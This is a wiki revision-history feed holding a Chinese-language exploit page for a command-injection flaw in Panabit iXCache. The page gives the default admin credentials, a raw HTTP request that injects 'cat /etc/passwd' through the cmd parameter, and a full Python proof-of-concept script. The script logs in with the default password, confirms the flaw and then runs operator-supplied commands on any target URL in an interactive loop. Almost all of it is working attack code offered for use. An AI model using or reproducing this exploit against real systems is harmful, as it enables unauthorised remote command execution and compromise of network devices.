https://pwnwiki.com/index.php?action=history&feed=atom&title=Panabit_iXCache_ajax_cmd_%E5%BE%8C%E5%8F%B0%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
Panabit iXCache ajax cmd 後台命令執行漏洞 - Revision history
2026-04-10T01:48:58Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Panabit_iXCache_ajax_cmd_%E5%BE%8C%E5%8F%B0%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=2738&oldid=prev
Pwnwiki: Created page with "==默認賬戶密碼== admin/ixcache ==漏洞利用== 進入後台後點擊命令行,訪問Url <pre> /cgi-bin/Maintain/cfg_cmd </pre> 輸入命令時使用 ; 即可命..."
2021-05-08T02:47:23Z
<p>Created page with "==默認賬戶密碼== admin/ixcache ==漏洞利用== 進入後台後點擊命令行,訪問Url <pre> /cgi-bin/Maintain/cfg_cmd </pre> 輸入命令時使用 ; 即可命..."</p>
<p><b>New page</b></p><div>==默認賬戶密碼==<br />
admin/ixcache<br />
<br />
<br />
==漏洞利用==<br />
<br />
進入後台後點擊命令行,訪問Url<br />
<pre><br />
/cgi-bin/Maintain/cfg_cmd<br />
</pre><br />
<br />
輸入命令時使用 ; 即可命令拼接執行任意命令<br />
<br />
[[File:Pa-3.png | 600px]]<br />
<br />
==Request==<br />
<pre><br />
POST /cgi-bin/Maintain/ajax_cmd?action=runcmd&cmd=ixeye%20;cat%20/etc/passwd HTTP/1.1<br />
Host: <br />
Connection: close<br />
Content-Length: 0<br />
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"<br />
Accept: */*<br />
X-Requested-With: XMLHttpRequest<br />
sec-ch-ua-mobile: ?0<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36<br />
Sec-Fetch-Site: same-origin<br />
Sec-Fetch-Mode: cors<br />
Sec-Fetch-Dest: empty<br />
Accept-Encoding: gzip, deflate<br />
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6<br />
Cookie: _walkthrough-introduction=0; pauser_1615540522_368691=paonline_admin_73708_16196903931;Path=/<br />
</pre><br />
<br />
==POC==<br />
<pre><br />
import requests<br />
import sys<br />
import random<br />
import re<br />
import base64<br />
import time<br />
from requests.packages.urllib3.exceptions import InsecureRequestWarning<br />
<br />
def title():<br />
print('+------------------------------------------')<br />
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')<br />
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')<br />
print('+ \033[34m公众号 : PeiQi文库 \033[0m')<br />
print('+ \033[34mTitle : Panabit iXCache cfg_cmd 后台命令执行漏洞 \033[0m')<br />
print('+ \033[36m使用格式: python3 poc.py \033[0m')<br />
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')<br />
print('+------------------------------------------')<br />
<br />
def POC_1(target_url):<br />
vuln_url = target_url + "/login/userverify.cgi"<br />
headers = {<br />
"Content-Type": "application/x-www-form-urlencoded",<br />
}<br />
data = "username=admin&password=ixcache"<br />
try:<br />
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br />
response = requests.post(url=vuln_url, headers=headers,data=data, verify=False, timeout=5)<br />
print("\033[36m[o] 正在请求 {}/login/userverify.cgi.... \033[0m".format(target_url))<br />
if '/cgi-bin/monitor.cgi' in response.text and response.status_code == 200:<br />
print("\033[32m[o] 目标 {} 存在默认口令 admin/ixcache \033[0m".format(target_url))<br />
cookie = response.headers['Set-Cookie']<br />
print("\033[36m[o] 获取Cookie : {} \033[0m".format(cookie))<br />
POC_2(target_url, cookie)<br />
else:<br />
print("\033[31m[x] 请求失败 \033[0m")<br />
sys.exit(0)<br />
<br />
except Exception as e:<br />
print("\033[31m[x] 请求失败 \033[0m", e)<br />
<br />
def POC_2(target_url, Cookie):<br />
vuln_url = target_url + "/cgi-bin/Maintain/ajax_cmd?action=runcmd&cmd=ixeye%20;cat%20/etc/passwd"<br />
headers = {<br />
"Content-Type": "application/x-www-form-urlencoded",<br />
"Cookie": "_walkthrough-introduction=0;{}".format(Cookie)<br />
}<br />
try:<br />
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br />
response = requests.post(url=vuln_url, headers=headers, verify=False, timeout=5)<br />
if 'root' in response.text and response.status_code == 200:<br />
print("\033[32m[o] 目标 {}存在漏洞 ,执行 cat /etc/passwd \033[0m".format(target_url))<br />
print("\033[36m[o] 响应为:\n{} \033[0m".format(response.text))<br />
while True:<br />
Cmd = input("\033[35mCmd >>> \033[0m")<br />
if Cmd == "exit":<br />
sys.exit(0)<br />
else:<br />
POC_3(target_url, Cmd, Cookie)<br />
except Exception as e:<br />
print("\033[31m[x] 请求失败 \033[0m", e)<br />
<br />
def POC_3(target_url, Cmd, Cookie):<br />
Cmd = Cmd.replace(" ", "%20")<br />
vuln_url = target_url + "/cgi-bin/Maintain/ajax_cmd?action=runcmd&cmd=ixeye%20;{}".format(Cmd)<br />
headers = {<br />
"Content-Type": "application/x-www-form-urlencoded",<br />
"Cookie": "_walkthrough-introduction=0;{}".format(Cookie)<br />
}<br />
try:<br />
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br />
response = requests.post(url=vuln_url, headers=headers, verify=False, timeout=5)<br />
print("\033[36m[o] 响应为:\n{} \033[0m".format(response.text))<br />
<br />
except Exception as e:<br />
print("\033[31m[x] 请求失败 \033[0m", e)<br />
<br />
<br />
if __name__ == '__main__':<br />
title()<br />
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))<br />
POC_1(target_url)<br />
</pre><br />
<br />
==參考==<br />
https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Panabit/Panabit%20iXCache%20cfg_cmd%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md</div>
Pwnwiki